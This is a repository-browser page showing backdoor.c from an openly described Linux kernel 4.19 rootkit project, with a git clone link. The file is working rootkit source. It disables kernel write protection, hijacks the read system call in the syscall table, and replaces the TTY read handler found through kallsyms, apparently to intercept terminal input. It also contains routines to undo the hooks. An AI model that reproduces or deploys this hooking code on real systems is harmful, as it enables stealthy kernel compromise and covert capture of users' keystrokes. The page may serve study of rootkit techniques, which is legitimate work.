linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

backdoor.c (1289B)

      1 #include <linux/tty.h>
      2 #include <linux/delay.h>
      3 
      4 #include "common.h"
      5 #include "creds.h"
      6 #include "backdoor.h"
      7 #include "read.h"
      8 #include "hook.h"
      9 #include "inputlog.h"
     10 
     11 void
     12 backdoor_read(void)
     13 {
     14     disable_protection();
     15     sys_calls[__NR_read] = (void *)g7_read;
     16     enable_protection();
     17 }
     18 
     19 void
     20 backdoor_tty(void)
     21 {
     22     if (!sys_tty_read) {
     23         sys_tty_read
     24             = ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read;
     25 
     26         disable_protection();
     27         ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read
     28             = (void *)g7_tty_read;
     29         enable_protection();
     30     }
     31 }
     32 
     33 void
     34 unbackdoor(void)
     35 {
     36     int cur;
     37 
     38     if (sys_tty_read) {
     39         disable_protection();
     40         ((struct file_operations *)kallsyms_lookup_name("tty_fops"))->read
     41             = (void *)sys_tty_read;
     42         enable_protection();
     43 
     44         while ((cur = atomic_read(&tty_read_count)) > 0)
     45             msleep(250);
     46 
     47         sys_tty_read = NULL;
     48     } else if (sys_read) {
     49         disable_protection();
     50         sys_calls[__NR_read] = (void *)sys_read;
     51         enable_protection();
     52 
     53         // Sleeping here is very important, as without it
     54         // we would stall the CPU...
     55         while ((cur = atomic_read(&read_count)) > 0)
     56             msleep(250);
     57     }
     58 }